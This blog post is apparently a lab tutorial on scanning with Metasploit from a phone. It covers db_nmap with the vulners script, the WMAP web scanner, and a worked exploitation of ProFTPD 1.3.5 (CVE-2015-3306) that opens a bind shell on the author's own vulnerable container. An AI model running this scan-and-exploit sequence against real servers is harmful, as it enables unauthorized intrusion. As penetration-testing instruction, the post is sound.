heywoodlh thoughts

Vulnerability Scanning with Metasploit

In testing Kali Nethunter on my OnePlus One I have been on the hunt for tools and workflows that can run on something as lightweight as an Android phone. I also want to see how far I can get without me having to run an external server.

Vulnerability scanning using OpenVAS, Nessus, or anything else is definitely not something that runs well on lightweight hardware. In my experience, a dedicated vulnerability scanner is pretty resource intensive.

So in using Metasploit as my primary tool for exploiting vulnerable software, I wanted to document some tips I’ve found to do vulnerability scanning using Metasploit. I will update this post if I find more workflows.

Nmap + Metasploit: #

I recently found out that you can use nmap directly from Metasploit using the db_nmap module. Using this module is really nice because you can get the service results imported directly into Metasploit.

Here’s an example db_nmap command in Metasploit:

msf6 > db_nmap -sV

Here’s the output (this host is running my vulnerable Docker container):

msf6 > db_nmap -sV
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 03:47 UTC
[*] Nmap: Nmap scan report for (
[*] Nmap: Host is up (0.12s latency).
[*] Nmap: rDNS record for
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: 21/tcp   open     ftp         ProFTPD 1.3.5
[*] Nmap: 22/tcp   open     ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
[*] Nmap: 25/tcp   filtered smtp
[*] Nmap: 80/tcp   open     http        Apache httpd 2.4.7 ((Ubuntu))
[*] Nmap: 139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 631/tcp  open     ipp         CUPS 1.7
[*] Nmap: 6667/tcp open     irc         UnrealIRCd
[*] Nmap: Service Info: Hosts: VULN, irc.TestIRC.net; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 18.18 seconds

Now, Metasploit is aware of those services on that host. Check with the services command:

msf6 > services

host          port  proto  name         state     info
----          ----  -----  ----         -----     ----  21    tcp    ftp          open      ProFTPD 1.3.5  22    tcp    ssh          open      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 Ubuntu Linux; proto
                                                  col 2.0  25    tcp    smtp         filtered  80    tcp    http         open      Apache httpd 2.4.7 (Ubuntu)  139   tcp    netbios-ssn  open      Samba smbd 3.X - 4.X workgroup: WORKGROUP  445   tcp    netbios-ssn  open      Samba smbd 3.X - 4.X workgroup: WORKGROUP  631   tcp    ipp          open      CUPS 1.7  6667  tcp    irc          open      UnrealIRCd

With db_nmap it will automatically import vulnerabilities if you use any of nmap’s vulnerability scanning scripts.

Here’s an example command:

msf6 > db_nmap -sV --script=vulners.nse

Once that command completed, I could use the vulns command to check out the exploits stored in Metasploit that were discovered using nmap:

msf6 > vulns


Timestamp                Host          Name                             References
---------                ----          ----                             ----------
2021-08-08 03:55:55 UTC  cpe:/a:proftpd:proftpd:1.3.5     CVE-2015-3306,SAINT:950EB68D408A40399926A4CCAD3CC62E,SAINT:63FB77B9136D48259E4F0D4CDA35E957,SAINT:1B08F4664C428B180EEC9617B41D9A2C,PROFTPD_MOD_COPY,PACKETSTORM:162777,PACKETSTORM:132218,PACKETSTORM:131567,PACKETSTORM:131555,PACKETSTORM:131505,MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC,EDB-ID:49908,EDB-ID:37262,EDB-ID:36803,EDB-ID:36742,1337DAY-ID-23720,1337DAY-ID-23544,SSV:61050,MSF:ILITIES/SUSE-CVE-2019-18217/,CVE-2019-19272,CVE-2019-19271,CVE-2019-19270,CVE-2019-18217,CVE-2016-3125,CVE-2013-4359,CVE-2017-7418


You can see there is a vulnerability that Metasploit has an exploit for in the above output of vulns:


So let’s exploit it:

msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/html
SITEPATH => /var/www/html
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/bind_awk 
payload => cmd/unix/bind_awk
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run 

[*] - - Connected to FTP server
[*] - - Sending copy commands to FTP server
[*] - Executing PHP payload /VlrUb.php
[*] Started bind TCP handler against
[*] Command shell session 1 opened ( -> at 2021-08-08 04:21:30 +0000

There we go! Shell created using the results of a vulnerability scan performed on an Android phone. Epic.

I would recommend using more nmap vulnerability scanning scripts with Metasploit’s db_nmap module. I found this article very useful on vulnerability scanning with nmap:

How to Detect CVEs Using Nmap Vulnerability Scan Scripts

Web Application Vulnerability Scans: #

This was also news to me, but Metasploit has a built-in web application vulnerability scanning module: WMAP:

WMAP Web Scanner

The documentation for WMAP in somebody else’s old Github repo of Metasploit’s outlines what makes WMAP special:


It doesn’t look like it’s been updated for 10 years. Per the explanation in the link above, WMAP will use information stored in the database to intelligently attack your target. In addition, you can create WMAP profiles to use newer or even custom modules in Metasploit – this makes WMAP extensible and still relevant.

Let’s try it out.

First, load wmap and configure your target:

msf6 > load wmap

| | | || | | || | || |-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf6 > wmap_sites -a
[*] Site created.
msf6 > wmap_targets -t
msf6 > wmap_targets -l
[*] Defined targets

     Id  Vhost         Host          Port  SSL    Path
     --  -----         ----          ----  ---    ----
     0  80    false  /drupal

Next, run tests against your target:

msf6 > wmap_run -t
[*] Testing target:
[*] 	Site: (
[*] 	Port: 80 SSL: false
[*] Testing started. 2021-08-08 04:43:27 +0000
[*] Loading wmap modules...

Finally, run your scan:

msf6 > wmap_run -e 
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*] 	Site: (
[*] 	Port: 80 SSL: false
[*] Testing started. 2021-08-08 04:50:06 +0000
=[ SSL testing ]=
[*] Target is not SSL. SSL modules disabled.
=[ Web Server testing ]=
[*] Module auxiliary/scanner/http/http_version

[+] Apache/2.4.7 (Ubuntu)
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration

Using Custom WMAP profiles: #

In the Metasploit Github repo there is some documentation showing how you can extend WMAP to use other modules using WMAP profiles:


Here’s the file:

# WMAP 1.0 Sample Profile
# wmap_run -e /path/to/profile
# Just add the name of the module. Use # for comments

You can see from the comments in the file that you can extend WMAP to use other modules. This makes WMAP really useful as you can test newer or custom Metasploit modules against a web server.

So as an easy example, you could use that example profile, place it in /tmp/wmap-profile and then run the WMAP profile with the following command in Metasploit:

msf6 > wmap_run -e /tmp/wmap-profile

As I stated earlier, this makes WMAP extensible and will probably keep it forever useful as Rapid 7 continues to create and update Metasploit’s modules.

Written on August 7, 2021

linux security vulnerabilities vulnerability metasploit